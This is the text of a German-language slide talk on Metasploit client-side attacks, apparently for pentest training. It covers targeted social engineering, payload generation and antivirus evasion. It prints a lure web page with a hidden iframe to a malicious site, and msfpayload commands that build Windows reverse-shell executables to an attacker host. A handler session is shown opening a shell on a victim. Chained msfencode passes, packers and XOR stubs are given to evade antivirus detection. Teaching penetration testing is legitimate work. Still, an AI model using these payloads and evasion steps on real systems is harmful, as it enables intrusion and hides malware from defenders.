Metasploit Framework Unleashed – Beyond Metasploit

Client Side Exploits

Einführung

Exploit-Generierung

AntiVirus Bypass

<< Inhalt <<

Einführung

<< Einführung <<

Client Side Exploits == gerichtete/gezielte Attacken

Zielen auf eine bestimmte Organisation /

Unternehmen / Personen ab

Zielen auf eine spezielle Software oder IT

Infrastruktur ab

<< Einführung <<

Warum Client-Side Exploits?Überwinden des Perimeters ist heutzutage viel schwieriger als früher

Mehr ausgereifte Abwehrtechniken und Verteidigungsprogramme:

- Security Teams- Aufteilung interne / externe / DMZ-Netze- Gehärtete dedizierte Server- Firewalls- IDS/IPS- Security Event Monitoring und Alarmierung- verbessertes Patchmanagement- Verbesserung der Software Sicherheit- erhöhtes Sicherheitsbewußtsein

Was ist dann heutzutage die „low hanging fruit“?

<< Einführung <<

Warum Client-Side Exploits?

Wer hat immer Zugriff aufs interne Netz? Der USER

Wer hat gleichzeitig Zugriff aufs Internet? Der USER

Wer ist eventuell lokaler Admin oder Domänenadmin? Der USER

Wer hat legitimen Zugriff auf sensible Unternehmensdaten? Der USER

Außerdem: Die Arbeitsrechner der User sind (normalerweise) weniger geschützt und gepatcht als Server mehr Angriffsvektoren

Grosse Gefahr: zunehmend 0-day Exploits

<< Einführung <<

Warum gezielte Attacken:

Erkennung:

- bei individuellen Emails ist das Anspringen von Netzwerk Spam- und AV Filtern weniger wahrscheinlich

Social Engineering:

- gezielte Attacken können individuell auf das Opfer zugeschnitten werden- werden daher mit höherer Wahrscheinlichkeit vom Opfer gelesen / geöffnet / angeklickt

<< Einführung <<

Phasen der Attacke:

Informationsgewinnung

- Persönliche Daten: Namen, Email-Adressen, etc.

(Google, Maltego,…..)

- Unternehmensdaten: Abteilungen, Partner, etc.

<< Einführung <<

Phasen der Attacke:

Generierung des CS Exploits:

- metasploit / msfpayload

- SET (Social Engineering Toolkit):

-> Baukasten für Social-Engineering Attacken

-> greift auf Teile von Metasploit zu

- etc.

<< Einführung <<

Phasen der Attacke:

Verbreitung und Zur-Ausführung-Bringung des Exploits mit

Social Engineering

(Email, USB stick,

Fake Websites, ……)

<< Einführung <<

Social Engineering - Email:

<< Einführung <<

Social Engineering – präparierte WebSeite:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Free I Love You Ecards, I Love You Greeting Cards, I Love You Greetings, Cards, ecards, egreetings</title> <meta name=description content="Send free cyber electronic greeting card and postcards with quotes and colors. eCards for holidays,birthdays,graduation,romantic,weddings,thank you,say hello to your friends. All occasion greeting cards,postcards,free eCards."> </head> <body background="bg.gif"> <center> <a href="winner.exe"><img border="0" src="winner.gif"></a><br><br> <font size="+1" face="Arial">Who is loving you? Do you want to know? <br>Just <a href="mylove.exe">click here</a> and choose either "Open" or "Run".</font><br><br><br> <img border="0" src="123g.gif"> </center> <iframe src=“http://www.fakesite.tv/malicious.html" width="1" height="1" style="visibility:hidden;position:absolute"></iframe> </body> </html>

<< Einführung <<

Phasen der Attacke:

Installation der Schadsoftware:

- Backdoor

- Bot

- meterpreter

- etc.

<< Einführung <<

Verbreitung von Malware: Web Browser Sicherheitslücken:

- Buffer Overflows- XSS- Plugins- Java / JavaScript / ActiveX- Information Disclosure: Javascript (Browser History, gecachte Passwörter, Systeminfos, etc.)

Binäre Payloads (eMail, WebSeiten, USB-Sticks, etc.)

File Format Sicherheitslücken:- MS Office Dokumente - PDF (Adobe !!!)- Image Files (jpg: MS04-028, wmf: MS06-001)- Media Files (asf: CVE-2006-4702, asx: CVE-2006-6134)

<< Einführung <<

Exploit-Generierung

<< Exploit-Generierung <<

Binäre Payload mit msfpayload

root@bt4:/pentest/exploits/framework3# ./msfpayload –h

Usage: ./msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar>

Framework Payloads (225 total)==============================

Name Description---- -----------aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shellaix/ppc/shell_find_port Spawn a shell on an established connectionaix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shellbsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shellbsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shellbsd/x86/exec Execute an arbitrary commandbsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service...

<< Exploit-Generierung <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp O

Name: Windows Command Shell, Reverse TCP InlineVersion: 6479Platform: WindowsArch: x86Needs Admin: NoTotal size: 287

Provided by:vlad902 vlad902@gmail.com

Basic options:Name Current Setting Required Description ---- --------------- -------- -----------EXITFUNC seh yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port

Description:Connect back to attacker and spawn a command shell

<< Exploit-Generierung <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp

LHOST=10.10.10.10 LPORT=31337 O

Name: Windows Command Shell, Reverse TCP Inline

Version: 6479

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 287

Provided by:

vlad902 vlad902@gmail.com

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC seh yes Exit technique: seh, thread, process

LHOST 10.10.10.10 yes The local address

LPORT 31337 yes The local port

Description: Connect back to attacker and spawn a command shell

<< Exploit-Generierung <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp

LHOST=10.10.10.10 LPORT=31337 X > /tmp/1.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/shell_reverse_tcp

Length: 287

Options: LHOST=10.10.10.10,LPORT=31337

<< Exploit-Generierung <<

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcp

msf exploit(handler) > set LHOST 10.10.10.10LHOST => 10.10.10.10

msf exploit(handler) > set LPORT 31337LPORT => 31337

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (10.10.10.10:31337 -> 10.10.10.20:1150)

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents>

<< Exploit-Generierung <<

Weitere Metasploit Payloads:

Linux Payloads

Java Applet Infection

VBScript Infection

Fileformat Exploits (pdf, MS Office, etc.)

<< Exploit-Generierung <<

AV Bypass

<< AV Bypass <<

Tools:

Packer (UPX, ASPack, NsPack, PE_Compact, …..)

Crypter (EXECryptor, Fearz Crypter, ….)

Msfencode

Technik:

Signaturen verändern (Hex Editor, Debugging und Code verändern, XOR stub, ….)

„Nichts tun“: Malware verhält sich und sieht aus wie eine legitime Applikation (stuxnet)

Eigene Malware schreiben

<< AV Bypass <<

http://blogs.paretologic.com/malwarediaries/index.php/2010/02/22/virustotal/http://www.offensivecomputing.net/?q=node/939

<< AV Bypass <<

Tools:

Packer, Crypter:

<< AV Bypass <<

Tool: msfencode

root@bt4:/pentest/exploits/framework3# ./msfencode -h

Usage: ./msfencode

OPTIONS:

-a The architecture to encode as-b The list of characters to avoid: 'x00xff'-c The number of times to encode the data-e The encoder to use-h Help banner-i Encode the contents of the supplied file path

-k Keep template working; run payload in new thread (use with -x)-l List available encoders-m Specifies an additional module search path-n Dump encoder information-o The output file-s The maximum size of the encoded data-t The format to display the encoded buffer with (raw, ruby, perl, c,

exe, vba)

-x <opt> Specify an alternate executable template

<< AV Bypass <<

root@bt4:/pentest/exploits/framework3# ./msfencode -l

Framework Encoders==================

Name Rank Description---- ---- -----------cmd/generic_sh normal Generic Shell Variable Substitution Command Encodergeneric/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoderphp/base64 normal PHP Base64 encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoderx86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

<< AV Bypass <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp

LHOST=10.10.10.10 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe >

/tmp/2.exe

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)

<< AV Bypass <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp

LHOST=10.10.10.10 LPORT=31337 R |

./msfencode -e x86/shikata_ga_nai -t raw -c 10 |

./msfencode -e x86/call4_dword_xor -t raw -c 10 |

./msfencode -e x86/countdown -t exe > /tmp/3.exe

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)

.

.

.

<< AV Bypass <<

Aus msfpayload –h:

window/shell_reverse_tcp: Connect back to attacker and spawn a command shell

windows/shell/reverse_tcp: Connect back to attacker andspawn a command shell (staged)

<< AV Bypass <<

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp

LHOST=10.10.10.10 LPORT=31337 X > /tmp/4.exe

Created by msfpayload (http://www.metasploit.com).Payload: windows/shell/reverse_tcpLength: 278Options: LHOST=10.10.10.10,LPORT=31337

<< AV Bypass <<

Technik: Binary ändern mit Resource Hacker

<< AV Bypass <<

Technik: Binary ändern mit Resource Hacker

<< AV Bypass <<

Technik: Binary ändern mit Resource Hacker

<< AV Bypass <<

Technik: Binary ändern mit Resource Hacker

<< AV Bypass <<

Technik: Binary ändern mit Resource Hacker

<< AV Bypass <<

Vorher:

Nachher:

Technik: XOR stub

<< AV Bypass <<

Unverändertes Binary – auf HD:

Entry Point

Technik: XOR stub

<< AV Bypass <<

Geändertes Binary – auf HD:

Entry Point - Hijacked

Technik: XOR stub

<< AV Bypass <<

Geändertes Binary – in Memory:

Entry Point - Hijacked

<< thx <<

Contact: fancy@back-track.de fancy@corelan.be http://www.corelan.be:8800